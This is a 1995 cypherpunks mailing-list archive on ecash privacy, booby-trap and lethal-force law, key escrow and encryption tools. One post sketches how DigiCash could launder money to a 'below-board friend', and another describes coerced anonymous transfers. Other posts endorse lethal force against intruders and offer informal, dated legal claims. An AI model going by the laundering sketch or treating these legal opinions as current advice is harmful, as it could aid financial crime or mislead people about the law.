I have an electrified fence on one side of my property, to keep the deer away. Lethal voltage fences, to keep humans out, are another matter. .... >I don't know what you call it but if nothing else it is ethicaly and moraly >reprehinsible. Different strokes for different folks. Anyone entering my house unannounced faces lethal response. I think of it as evolution in action, and doubt I would lose any sleep over this. It has nothing to do with equating human life over property, it has to do with defending one's property and (maybe) one's life. Here in California, it is becoming more and more common for "home invasions" to be followed by execution of all of the witnesses. (Read "The San Jose Mercury News" for accounts of gang invasions in which all the residents in a home are lined up and shot, excecution-style.) I won't get into a discussion of which states permit lethal force responses, as this is a topic which even I think belongs in talk.politics.guns or similar fora. Suffice it to say that most states allow lethal response under threatening circumstances. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hfinney at shell.portal.com Tue Sep 5 21:33:34 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 5 Sep 95 21:33:34 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: <199509060432.VAA05003@jobe.shell.portal.com> From: shamrock at netcom.com (Lucky Green) > So it is harder to compile dosiers on people. Big deal. The recipient can > still determine who gets the goods paied for by the "anonymous" ecash by > conventional means (hint: shipping address), so the payee anonymity is of > little value as far as protecting the privacy of the payer (most likely > the recipient of the goods) is concerened. This would be true for physical goods in any payment system, no matter how anonymous, unless physical remailers are used (and they have their limitations). However software (including music, video, etc.) would be easier to deliver anonymously. It is generally agreed that more of our economy is moving towards information exchanges and so ecash-like systems can play an increasingly larger part in protecting privacy. To me, this is indeed a big deal. Even for physical goods, the use of ecash is better than credit cards because the information about purchases is distributed rather than centralized. Every time I look at my credit card bill I feel dismayed at what the company is finding out about my family. Ecash could also be used as a cash replacement in smartcards. Consider as an alternative a fully traceable payment system, where you use your debit card at the supermarket, the bus station, the snack bar, the drug store. I suspect that if we don't get something like ecash then this system will be the alternative. It opens up possibilities for dossiers that will fulfill Big Brother's dreams. Virtually every move of every citizen will be recorded in just a few centralized places. IMO the protection of payor privacy that even Chaum's limited ecash provides is very important. > Ecash of course is of *no* value for the various assasination markets, > drug dealing, money laundring, etc that routinely get mentioned in the > same paragraph as Ecash. The reason is the *full traceability* of the > payee that has been deliberately built into the current version of Ecash. > A "feature" that you may rest assured will be part of all future versions > backed by anyone with even marginal reputation in the financial markets. Well, I have never fully accepted the notion that crypto was going to usher in an age of anarchy. As long as we deal with physical goods in the physical world it seems to me that anonymity will be difficult. On the net it is easier but man does not live by bits alone. For me, protecting privacy is a difficult enough problem. Transforming the world into a libertarian/anarchist utopia is somebody else's job. Hal P.S. Without seeing the technical specs it is hard to describe in detail, but generally Chaumian ecash allows fully anonymous coerced transfers. The payee/coercer supplies the blinded coins and forces the payor to use them to make withdrawals from his account. The resulting signed tokens are passed to the coercer who unblinds them and now has fully anonymous, untraceable cash tokens which he can spend. From wilcoxb at nagina.cs.colorado.edu Tue Sep 5 21:42:46 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Tue, 5 Sep 95 21:42:46 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: Message-ID: <199509060442.WAA08575@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I, Bryce Wilcox wrote: > > >I hope I'm not missing anything here. shamrock at netcom.com (Lucky Green) wrote: > > Only that Ecash has no benefits for transactions that are of an illegal > nature. The meaning of "illegal" is of course increasing as new laws are > passed every session of the legislature. Chaum says that (especially when speaking before U.S. Congress) but I think he is playing both sides of the fence. He is a die-hard privacy advocate who allegedly turns down lucrative business deals because he feels they would dilute his privacy achievements. The truth is that Chaumian DigiCash is a *lot* safer for criminals than, say, credit cards, and when it is combined with the other tools in a money launderer's toolbox, I expect it will be a great boon to them. Suppose you have acquired a million dollars worth of legal, above-board DigiCash dollars and you want to surreptitiously transfer this wealth to a below-board friend. Your friend creates a temporary anonymous account at an understanding bank. You just use a lot of small denominations to squirt the dollars to your friend's account. Then he squirts them to his real accounts and destroys the blinding factors that the temporary anon account used. Now without active physical surveillance, nobody other than yourself and your friend will ever know where the money went, and you can't prove that you gave it to him, either... I hope no bloodthirsty mob bosses or statist legislators are reading this... Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBME0mG/WZSllhfG25AQES6AP9H6wluOOoUKpN92hiVSrwrig4dKoRbPJt d7ROsrQUyx5OXBZXRxyrQvY3z/Qd4ytHXpoKAfpizGwAClqFubZ/OcRxTyiAudgG 0mA+dd9nHYPswAyVFmLk9rqkv3AIO3Ikq8uunh4KkUx72rmZf62G8+N4nkR7TKZP /E+1PDmuPzI= =wvSK -----END PGP SIGNATURE----- From an253398 at anon.penet.fi Tue Sep 5 22:07:21 1995 From: an253398 at anon.penet.fi (Mole Rat) Date: Tue, 5 Sep 95 22:07:21 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <9509060434.AA09596@anon.penet.fi> announce at xs4all.nl writes: [ snip ] > Police and members of Scientology church enter offices of XS4ALL > ================================================================ > > Amsterdam - thuesday september 5, 1995. > > Today at about 14:00, XS4ALL was visited by Mr. S. Braan, > bailiff. He was acting on behalf of the Religious > Technology Centre, better known as the Scientology Church, or > Scientology for short. He was assisted by a local police officer and Mr. > Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology > in The Netherlands. Also present were two computer experts (Mr. Ootjes > and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and > two American employees of Scientology, Mr. Weightman and Ms. Jenssen. [ snip ] This is the second or third time I've seen descriptions of such raids where cult (no, I'm not trying to be diplomatic) representatives were present and participating. Is this legal in Amsterdam? How about in the U.S.? Britain? If a police officer has a warrant then I really don't have much choice about letting him in. Am I also under an obligation to allow the people who filed for the warrant into my home or business? Thanks, Mole Rat ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From sandfort at crl.com Tue Sep 5 22:34:46 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 5 Sep 95 22:34:46 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <199509060419.XAA04296@einstein.ssz.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Tue, 5 Sep 1995, Jim Choate wrote: > . . . federal ruling that basicly says that if you meet a burglar in your > home at nite you can not kill or otherwise harm them unless you're life is > directly threatened. In short, you MUST give up the ground if at all > possible. . . . Citation please. Killing is usually a state matter. I doubt there was any such federal ruling. In California, there is a legal presumption that anyone who illegally enters an occupied dwelling, at night, is a threat to life or great bodily harm. You may, therefore, use deadly force without further evidence. (This means you can shoot 'em in the back if you want.) Now back to the booby-trapped computer thread: I think it would be better to have your booby-trap kill your data, not the nice men in the nomex ski masks. While those folks might take a dim view of the former, they would most certainly would take extreme umbridge at the latter. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From shamrock at netcom.com Tue Sep 5 22:57:11 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 22:57:11 PDT Subject: Non-Delivery Notification Message-ID: What is this shit? Got about ten today. --- begin forwarded text From: sysop at dkmail.dkeep.com To: shamrock at netcom.com Subject: Non-Delivery Notification Organization: Dragon Keep (904) 375-3500 Date: Wed, 06 Sep 95 00:05:41 EST NON-DELIVERY NOTICE ------------------- The message you sent on: Unknown to -unknown was undeliverable. ========================= !!! Automated Notice !!! ======================= E-mail replies to this user should have the following on the first line of message text: TO: -unknown ========================================================================== --- end forwarded text -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 22:57:13 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 22:57:13 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: At 23:56 9/5/95, Black Unicorn wrote: rypted mail preferred. > >Really it's hard to answer this because what constitutes a "NEW" act is a >real question in and of itself. > >For example, wire fraud. Is it a "NEW" crime? Or just a subset of >fraud, or mail fraud? If they guy would have gotten away before the new law was passed, it is a new crime. That's the stats I am looking for. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 22:57:17 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 22:57:17 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: At 22:42 9/5/95, Bryce Wilcox wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >I, Bryce Wilcox wrote: >> >> >I hope I'm not missing anything here. > > >shamrock at netcom.com (Lucky Green) wrote: >> >> Only that Ecash has no benefits for transactions that are of an illegal >> nature. The meaning of "illegal" is of course increasing as new laws are >> passed every session of the legislature. > > >Chaum says that (especially when speaking before U.S. Congress) but I think >he is playing both sides of the fence. He is a die-hard privacy advocate who >allegedly turns down lucrative business deals because he feels they would >dilute his privacy achievements. The truth is that Chaumian DigiCash is a >*lot* safer for criminals than, say, credit cards, and when it is combined >with the other tools in a money launderer's toolbox, I expect it will be a >great boon to them. Chaum is a privacy advocate when it comes to companies compiling dosiers on you. When it comes to criminal use, my conversations with Chaum, his public comments, and last not least the current implementation of his software suggest otherwise. > >Suppose you have acquired a million dollars worth of legal, above-board >DigiCash dollars and you want to surreptitiously transfer this wealth to a >below-board friend. Your friend creates a temporary anonymous account at an >understanding bank. Y Won't work. Ecash, except as used for frequent flyer like points, will exist in only *one* world wide e$ currency, issued by a single entity composed of various major banks and subject to US laws. Getting Ecash accounts will therefore be subject to the same legal requirenments that apply to normal US checking accounts. >Now without active physical surveillance, nobody other than yourself and your >friend will ever know where the money went, and you can't prove that you gave >it to him, either... You or a sting operation can always reveal the recipient by publishing the blinding factor. Besides, your Ecash client keeps a log of the payees. -- Lucky Green PGP encrypted mail preferred. From unicorn at access.digex.net Tue Sep 5 22:58:40 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 5 Sep 95 22:58:40 PDT Subject: Are booby-trapped... [Detailed treatment] In-Reply-To: Message-ID: >From tcmay at got.netWed Sep 6 00:30:39 1995 Date: Tue, 5 Sep 1995 20:49:25 -0700 From: "Timothy C. May" To: cypherpunks at toad.com Subject: Are booby-trapped computers legal? (I've changed the name of this thread.) At 2:30 AM 9/6/95, Lucky Green wrote: >>I am wondering about the legalities of booby trapped computer equipment. >>Would it be legal if a clear warning to the fact was posted on the >>hardware? >There are two types of "booby traps" to consider: >* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if >and when a burglar enters. Or an electrified region of a room is set to >"get energized" when an intruder enters. These are "surprises" and are >canonical booby traps. >These have been found to be illegal in several court cases. (I'm not a >lawyer, but I've been reading about them for 20 years. Famous cases >where a burglar sued, and won, because he was injured when breaking >into a house.) Katko v. Briney, 183 N.W.2d 657 (Iowa 1971). The defendants owned an old, boarded-up house, located several miles from their home, in which they stored various old bottles, fruit jars and the like, which they considered to be antiques. Several times during the previous several years the windows in the house had been broken and the entire place "messed up." The defendants first posted "no tresspass" signs to keep off intruders, but the break-ins continued. Shortly before the injury to the plaintiff, the defendants placed a "shotgun trap" in one of the bedrooms. The gun was first positioned so as to hit an intruder in the stomach, but Mr. Briney, at his wife's insistance, lowered it to hit at the legs. He said that he set the gun "because I was mad and tired of being tormented," but insisted that "he did not intend to injure anyone." The plaintiff was shot in the legs and permantly injured when he entered the defendant's bedroom shortly after the gun was set. He had been to the place several times before, and had intended upon this occasion to steal some of the defendant's possessions. The plaintiff pleaded guilty to a charge of larceny and paid a fine of $50. He also sued the defendant for personal injuries and was awarded $20,000 in actual damages and $10,000 in punitive damages. [Jury instruction #6 was one of the items at issue in the appeal to the Iowa Supreme court] Instruction 6 stated: "An owner of a premises is prohibited from willfully or intentionally injuring a tresspasser by means of force that either takes life or inflicts great bodily injury and therefore a person owning a premise is prohibited from setting out "spring guns" and like dangerous devices which will likely take life or inflict great bodily injury, for the purpose of harming tresspassers. The fact that the tresspasser may be acting in violation of the law does not change the rule. The only time when such conduct of setting a "spring gun" or a like dangerous device is justified would be when the tresspasser was committing a felony of violence or a felony punishable by death, or where the trespasser was endangering human life by his act." [Upheld on appeal] Note that the case caused a literal riot in Iowa. Checks poured in to the Briney's (the boobytrappers) from everywhere (by one account, even from prisons). They raised over $10,000 this way. Briney was heard to comment: "They used booby traps in Viet Nam didn't they?" Asked if he would do it again: "There's one thing I'd do different, though, I'd have aimed that gun a few feet higher." Reference is given to a front page story in the Chicago Trib. of April 25, 1975. See also, Allison v. Fiscus, 156 Ohio St. 120, 100 N.E.2d 237 (1951). [Plaintiff could collect damages when he was injured by a booby trap consisting of two sticks of dynamite even though he was feloniously breaking into defendant's warehouse with intent to steal.] Some states allow a criminal liability, even of homocide, to landowners installing booby traps. The basic rule today in most states resembles the restatement position: Section 85. Use of Mechanical Device Threatening Death or Serious Bodily Injury. The actor is so far privileged to use such a device intended or likely to cause serious bodily harm or death for the purpose of protecting his land or chattels from intrusion that he is not liable for the serious bodily harm or death thereby caused to an intruder whose intrusion is, in fact, such that the actor, were he present, would be privileged to prevent or terminate it by the intentional infliction of such harm. Some states have deviated from Section 85, however, California included. People v. Caballos, 12 Cal. 470, 526 P.2d 241, 116 Cal. Rptr. 233 (1974). "It seems clear that the use of such [mechanical] devices should not be encouraged. Moreover, whatever may be thought in torts, the [Restatement] rule setting forth an exception to liability for death or injuries inflicted by such devices 'is inappropriate in penal law for it is obvious that it does not prescribe a workable standard of conduct; liability depend on fortuitous results.' (i.e. what the trespasser was doing in there in the first place) What constitutes reasonable force is generally a question for the jury. Some exceptions exist. When the invasion is peaceful, and in the presence of the possessor, the use of any force at all will be unreasonable unless a request has been made to depart. Chapell v. Schmidt, 38 P. 892 (1894) (Defendant caned elderly person who was picking flowers); A request need not be made however when conduct of the intruder would indicate to a reasonable person that it would be useless or that it could not safely be made in time. See Higgins v. Minagham, 47 N.W. 941 (1891). >* Type 2 Booby Trap: electrified perimeter fences. So long as these are >adequately marked ("If you touch this fence, you will probably die"), >and are not public nuisances where children and pets will inadvertently >validate Darwin's theory, these are--I think--legal. There may be >license fees required, to build an electrified fence, but I think it is >possible to build a lethal voltage electrified fence on one's property. While clear notice of the danger of deadly force is a partial defense to criminal and civil liability in some states, (Starkey v. Dameron, 21 P.2s 1112 (1933) [Colorado] State v. Marfaudille, 92 P. 939 (1907) [Washington State]) and implicit or constructive notice in others (Quigley v. Clough, 53 N.E. 884 (1899) (Presence of barbed wire may constitute notice of deadly or injurious force)), some prohibit it outright, notice or not (State v. Plumlee, 149 So. 425 (1933) [La.] An obnoxiously exhaustive treatement of the entire subject can be found in Bohlen and Burns, The privilege to Protect Property by Dangerous Barriers and Mechanical Devices, 35 Yale L.J. 535 (1926); or for a more interesting treatement (IMHO) Hart, Injuries to Trespassers, 47 Law Q.Rev. 92 (1931). >Thus, I suspect it is fully legal to build an electrified fence around >one's PC, providing suitable warnings are included. Varies by state. If your intent is to prevent ACCESS to the computer, as opposed to THEFT, I cannot see how electrocution could be considered "reasonable force" to prevent it, given the host of other methods to prevent access without harm to the trespasser. >I would not call the second type a real booby trap, though some courts >might, depending. A properly labelled electrified fence seems legal, on >one's own property, but may not be. I don't know that CRIMINAL liability will insue in those states that exempt defenses with warnings, but certainly civil liability might. Never know what a jury will do. >And certainly I think any explosive-rigged system is illegal, for >explosives reasons if not for booby trap reasons. Again, reasonable force will be a question for the jury. Explosives are a bit dramatic for a jury to swollow as "reasonable." Explosives charges will likely be in counts 4&5. >I know of no case law on this, and suspect that if an FBI agent were to >be electrocuted or blown up upon trying to open/use/disconnect the PC, >even with clear warnings, that a prosecution would happen. Results are >unclear (to me). >(I think that if an FBI agent were to be electrocuted while climbing on >a clearly labelled electrified fence, no prosecution would result.) >Of course, if a PC were to be clearly labelled as being rigged, then >steps could presumably be taken to defuse the arrangement. Ominously, the possessor is responsible for determining the 'trespasser's' right to enter the property. In other words, if a officer with legal rights to enter the property was injured or killed by a booby trap (warnings or not) liability would almost without question insue. The only defined defense available would be the officer's contributatory negligence (ignoring the sign- etc.). My guess is that FBI enters, sees the PC, calls bomb squad, a member of bomb squad is injured by explosive or electrocution or whatever, liability insues, warning or not. At this point warning is not an issue as the possessor would not have the right to repell legally entitled officers were he present and thus cannot repell them while absent. I've completely ignored the use of other deadly force in home invasion cases. Mr. Sandfort was pretty close to right on there for Cali. >--Tim May >---------:---------:---------:---------:---------:---------:---------:---- >Timothy C. May | Crypto Anarchy: encryption, digital money, >tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From chen at intuit.com Tue Sep 5 22:59:41 1995 From: chen at intuit.com (Mark Chen) Date: Tue, 5 Sep 95 22:59:41 PDT Subject: Crypto '95 In-Reply-To: <199509021859.OAA02093@bwh.harvard.edu> Message-ID: <9509060553.AA08998@doom.intuit.com> > The best talks were probably by Ross Anderson (Robustness > Principles for Public Key Protocols) and Adi Shamir (Myths and > Realities of Cryptography). One interesting aspect of Anderson's result is that it decisively breaks X.509 (he shows how to forge signatures in encrypt-before-signing protocols by computing a discrete log over the RSA modulus). I strongly recommend the paper. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From unicorn at access.digex.net Tue Sep 5 23:01:11 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 5 Sep 95 23:01:11 PDT Subject: Growth of actions definded as crime. Which math formula? In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Lucky Green wrote: > Date: Tue, 5 Sep 1995 23:01:01 -0800 > From: Lucky Green > To: Black Unicorn > Cc: cypherpunks at toad.com > Subject: Re: Growth of actions definded as crime. Which math formula? > > At 23:56 9/5/95, Black Unicorn wrote: > rypted mail preferred. > > > >Really it's hard to answer this because what constitutes a "NEW" act is a > >real question in and of itself. > > > >For example, wire fraud. Is it a "NEW" crime? Or just a subset of > >fraud, or mail fraud? > > If they guy would have gotten away before the new law was passed, it is a > new crime. This is very rare. It's mostly in definitional cases, for example, where Extacy was just not defined as a controlled substance some years ago. Created crimes are few and far between. There's a lot of jurisprudence. Criminals are creative, but there are only so many things that can't be covered by "Fraud." > > That's the stats I am looking for. > > -- Lucky Green > PGP encrypted mail preferred. > > > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From michaelb at primenet.com Tue Sep 5 23:01:57 1995 From: michaelb at primenet.com (Michael Bredimus) Date: Tue, 5 Sep 95 23:01:57 PDT Subject: Are booby-trapped computers legal? Message-ID: <199509060601.XAA08779@mailhost.primenet.com> At 09:43 PM 9/5/95 -0700, Timothy C. May wrote: >>As far as I know the owner of property has no legal right to kill a person >>either traspassing or stealing it in any of the 50 states. There was a >>recent federal ruling that basicly says that if you meet a burglar in your >>home at nite you can not kill or otherwise harm them unless you're life is >>directly threatened. In short, you MUST give up the ground if at all >>possible. Federal and all 50 states (as far as I have been able to >>determine) rule human life to have a inherantly higher value than property >>of any type (this does not apply to government institutions). > The laws regarding the use of deadly force against an unarmed burglar in one's home vary from state to state. In Massachusetts, for example, a homeowner has a DUTY to retreat from his own home before employing deadly force against an intruder. In Arizona, however, we prefer a much different approach. 13-411. Justification; use of force in crime prevention A. A person is justified in threatening or using both physical force and deadly physical force against another if an to the extent the person reasonably believes that physical force or deadly physical force is immediately necessary to prevent the other's commission of ... burglary in the second or first degree under section 13-1507 ... 13-1507. Burglary in the second degree; classification A. A person commits burglary in the second degree by entering or remaining unlawfully in or on a residential structure with the intent to commit any theft or any felony therein. michaelb at primenet.com From shamrock at netcom.com Tue Sep 5 23:15:31 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 23:15:31 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: At 2:00 9/6/95, Black Unicorn wrote: >> If they guy would have gotten away before the new law was passed, it is a >> new crime. > >This is very rare. It's mostly in definitional cases, for example, where >Extacy was just not defined as a controlled substance some years ago. > >Created crimes are few and far between. Excurse my ignorance, but it just begs the question. Why then all the new laws? Just to twist the penalty screw another turn? Confused, -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 23:40:44 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 23:40:44 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: <199509060638.CAA15606@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509060432.VAA05003 at jobe.shell.portal.com>, hfinney at shell.portal.com (Hal) wrote: >P.S. Without seeing the technical specs it is hard to describe in detail, >but generally Chaumian ecash allows fully anonymous coerced transfers. >The payee/coercer supplies the blinded coins and forces the payor to use >them to make withdrawals from his account. The resulting signed >tokens are passed to the coercer who unblinds them and now has fully >anonymous, untraceable cash tokens which he can spend. Assuming it can be done (I am checking), he would also have a large balance on his non-anoymous Ecash account that he would have a very hard time explaining to the IRS, FINsomething [sorry, forgot the name], and other interested and certainly to be involved parties. Cyberspace is much closer connected to the real world as many people on this list, myself included, would like to think it is. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBME1B1SoZzwIn1bdtAQF7FwGAgqmPsLaol1LbR2zb+FI7nmYDlp7BY91G SsT6iJukYmiKzcmG4YNPtGJ8QCrUGkZo =CNiP -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Sep 5 23:43:14 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 23:43:14 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <199509060640.CAA15617@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9509060434.AA09596 at anon.penet.fi>, an253398 at anon.penet.fi (Mole Rat) wrote: > This is the second or third time I've seen descriptions of such > raids where cult (no, I'm not trying to be diplomatic) > representatives were present and participating. Is this legal in > Amsterdam? How about in the U.S.? Britain? > > If a police officer has a warrant then I really don't have much > choice about letting him in. Am I also under an obligation to > allow the people who filed for the warrant into my home or > business? I doubt it. Get a good attorney. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBME1CaSoZzwIn1bdtAQGGyAF7BojcAMnxvfMcyJSWLHlJe0d0QezwdVGZ paDopX2LMcxjuUgupNXgF1GwRPbvx2dl =Dstl -----END PGP SIGNATURE----- From carolann at censored.org Tue Sep 5 23:58:27 1995 From: carolann at censored.org (Carol Anne Braddock) Date: Tue, 5 Sep 95 23:58:27 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <199509060658.XAA28913@mailhost.primenet.com> Anon.penet.fi succinctly scribed: > If a police officer has a warrant then I really don't have much > choice about letting him in. Am I also under an obligation to > allow the people who filed for the warrant into my home or > business? The aren't, but they do, and only a good civil rights lawyer can help you out of the resulting quagmire. It's done in a lot of civil cases, particularly where restraining orders are used. Love ALways, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From an5877 at anon.penet.fi Wed Sep 6 00:12:45 1995 From: an5877 at anon.penet.fi (deadbeat) Date: Wed, 6 Sep 95 00:12:45 PDT Subject: SSLRef (SSLtelnet) Message-ID: <9509060647.AA14769@anon.penet.fi> -----BEGIN PGP SIGNED MESSAGE----- > Verisign is a spin off of RSA. Verisign, Inc. (VERISIGN-DOM) 100 Marine Parkway, Suite 525 Redwood City, CA 94065 Domain Name: VERISIGN.COM Administrative Contact, Technical Contact, Zone Contact: Taylor, Simon (ST192) simon at RSA.COM (415) 508-1151 Record last updated on 21-Jun-95. DEADBEAT -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAgUBME0AO/FZTpBW/B35AQFdLAGAiV1RqNmLh5W+uuHeKsXX/819qK5WTq3Y TobFKWLxkTjkEwDs6Js7UB2PFRnt6gDk =HEHU -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From Davidwfox at eworld.com Wed Sep 6 00:59:22 1995 From: Davidwfox at eworld.com (Davidwfox at eworld.com) Date: Wed, 6 Sep 95 00:59:22 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: <950906005854_14454028@eWorld.com> ----------------------------- Begin Original Text ----------------------------- Has anyone heard about this bill? Comments? Cheers, Bob Hettinga ----------------------------- End Original Text ----------------------------- There was an investigative article in a recent Readers Digest (no I'm not a regular reader, heard it through Radio for the Print Handicapped in Australia) regarding a major counterfieting operation that uses same printing presses as used by US Treasury. The proceeds amount to BIG numbers and are used to fund various terrorist organizations. regards David Fox The e-commerce directory www.kweb.com From eric at remailer.net Wed Sep 6 01:28:08 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 6 Sep 95 01:28:08 PDT Subject: ANNOUNCE: September 1995 SF Bay Area physical meeting Message-ID: <199509060824.BAA02026@largo.remailer.net> ANNOUNCEMENT ============ What: September 1995 SF Bay Area physical meeting When: Saturday, 9 September 1995 12:00 noon - 6:00 p.m. Where: that hard-to-find loft space at 2nd & Brannan where we had July's meeting This month's meeting is the "Even More Catastrophically Overnamed Fourth Annual Cypherpunks Conclave, Congress, Schmooze-Fest, Meeting, and Feast". It's been three years since the first meeting at my house at the time in Oakland. If you only come to one meeting a year, come to this one. It's canonical. The agenda for this meeting is completely empty. I've been out of town for all but a total of about three weeks since the last meeting two months ago (and I'm gone the rest of this week and flying in Saturday morning). So where in the past we've had something approaching a schedule, this time I've not made even a pretense at scheduling. So just show up -- we always find something good to talk about. And besides, if you don't show up, you can't here about my unexpected genetic discovery! Directions follow. See you there. Eric ----------------------------------------------------------------------------- Exact Location: 340 Bryant St., 4th floor (top level); SF. Directions: 1) From the East Bay--Cross the Bay Bridge and take the LEFT exit for Main St./Embarcadero. You will be making a series of LEFT turns as follows : LEFT on Harrison LEFT on 2nd LEFT on Bryant. PARK! There is parking around the back of the building, and also across the street. 2) From the Peninsula--101 North, take the 4th Street exit. (The last SF Exit before the Bay Bridge. GET OFF HERE!) Follow to the RIGHT onto Bryant. Once you've crossed Second St., PARK! 3) If you get LOST: Call 415/284-0252. From asb at nexor.co.uk Wed Sep 6 01:46:03 1995 From: asb at nexor.co.uk (Andy Brown) Date: Wed, 6 Sep 95 01:46:03 PDT Subject: Equinox/cypherpunks/www Message-ID: Anyone that missed or was unable to get the UK TV programme Equinox might like to take a look at: http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html - Andy From rrothenb at ic.sunysb.edu Wed Sep 6 01:57:46 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 6 Sep 95 01:57:46 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: <199509052053.NAA01226@mycroft.rand.org> Message-ID: <199509060858.EAA15990@libws4.ic.sunysb.edu> > > Key Escrow Issues Meeting, September 6-7, 1995 > Discussion Paper #3 > > Export Criteria Discussion Draft -- > 64-bit Software Key Escrow Encryption Pardon my obvious question, but if there's some sort of GAK/LEAF, then why limit it to 64-bit? It seems possible that the assumption is 'just in case the GAK is tampered with' there's still a chance of cracking it, should the need arise. [..] I'm wondering just how securely a hack-proof escrow system can be written. It seems that someone can always go in with a sophisticated debugger and do some tampering of the software. And one need not mention the what-if-foreign-competitors-do-not-implement- this-scheme? question... From rrothenb at ic.sunysb.edu Wed Sep 6 02:14:01 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 6 Sep 95 02:14:01 PDT Subject: Secure Device 1.4 Question In-Reply-To: <199509060025.CAA05098@utopia.hacktic.nl> Message-ID: <199509060915.FAA16064@libws4.ic.sunysb.edu> > I just installed Secure Device, v1.4 on a PC at work. After > installing it, I looked at the encrypted volume and found the string > "SECDEV " starting at the fourth byte of the file. I'd prefer that > this file look like some temporary file that got left on the disk by > a program that didn't clean up properly after itself, and not be > identifiable as an encrypted volume. Problems with that: 1. SecDev needs a way to easily ID it's own files. Encrypting a known ID string would be a weakness (known plaintext) so it's better to have a plaintext identifyer. 2. If someone thinks it's a lost TMP file they will delete it. Not a risk you want. It's better if they think it's a strange type of swap file or something needed by an application. [..] Source is available... so you can change the ID string in source 